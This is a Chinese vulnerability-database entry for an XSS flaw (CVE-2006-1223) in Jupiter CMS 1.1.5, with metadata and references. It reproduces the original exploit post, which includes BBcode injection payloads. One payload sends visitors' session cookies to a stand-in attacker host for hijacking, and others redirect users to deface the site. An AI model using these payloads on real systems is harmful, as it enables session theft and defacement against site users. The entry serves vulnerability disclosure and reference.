Jupiter Content Manager 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109901 漏洞类型 跨站脚本
发布时间 2006-03-11 更新时间 2006-03-15
CVE编号 CVE-2006-1223 CNNVD-ID CNNVD-200603-257
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/1576
https://cxsecurity.com/issue/WLB-2006030064
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-257
|漏洞详情
在JupiterContentManager1.1.5及之前版本存在跨站脚本攻击(XSS)漏洞,远程攻击者可通过imageBBcode标签中的JavascriptURI,注入任意web脚本或HTML。
|漏洞EXP
Jupiter CMS <= 1.1.5 multiple XSS attack vectors.

Discovered by: Nomenumbra/[0x4F4C] Date: 3/11/2006 impact:high (privilege escalation,site defacement)

Jupiter CMS (http://www.highstrike.net/) is a dynamic CMS system like mambo or limbo, allowing users
to subscribe and posts events. Because no filtering is done upon [image] BBcode input, any user is
capable of inserting arbitrary javascript code, allowing for credential theft leading/session
hijacking and possibly site defacement.

Examples:

This would make a messagebox pop up saying 'XSS', whenever the events get loaded (on the main page,
calender,etc): [image=javascript:alert('XSS')]

This would allow an attacker to steal session ID's, which he could insert into his own cookie to
hijack sessions and elevate his/her privileges:

[image=javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)]

It would be used with SjaakRake's cookie stealer (http://www.milw0rm.com/exploits/1103), with maybe
the addition of a header("location: ".<anythinghere>), to redirect the user to a page of your choice,
to avoid suspicion and disclosure of your cookiestealer's location.

This injections would allow an attacker to redirect users to a page of his choice, effectively
defacing the page:

[image=javascript:window.navigate('http://www.evilhost.com/pwned.html')]

As you can see the possibilities are limitless, as long as you have a bit of fantasy!

Nomenumbra/[0x4F4C]

Questions: zerogue@gmail.com Site: http://0x4f4c.awardspace.com

# milw0rm.com [2006-03-11]
|参考资料

来源:BID
名称:17072
链接:http://www.securityfocus.com/bid/17072
来源:BUGTRAQ
名称:20060311JupiterCMS<=1.1.5multipleXSSattackvectors.
链接:http://www.securityfocus.com/archive/1/archive/1/427406/100/0/threaded
来源:VUPEN
名称:ADV-2006-0942
链接:http://www.frsirt.com/english/advisories/2006/0942
来源:SECUNIA
名称:19215
链接:http://secunia.com/advisories/19215
来源:XF
名称:jupitercm-bbcodetag-xss(25241)
链接:http://xforce.iss.net/xforce/xfdb/25241
来源:BUGTRAQ
名称:20060412Re:JupiterCMS<=1.1.5multipleXSSattackvectors.
链接:http://www.securityfocus.com/archive/1/archive/1/430903/100/0/threaded
来源:OSVDB
名称:23839
链接:http://www.osvdb.org/23839
来源:www.jupiterportal.com
链接:http://www.jupiterportal.com/index.php?n=modules/forum&a=3&d=11&o=5&q=313
来源:SREASON
名称:572
链接:http://securityreason.com/securityalert/572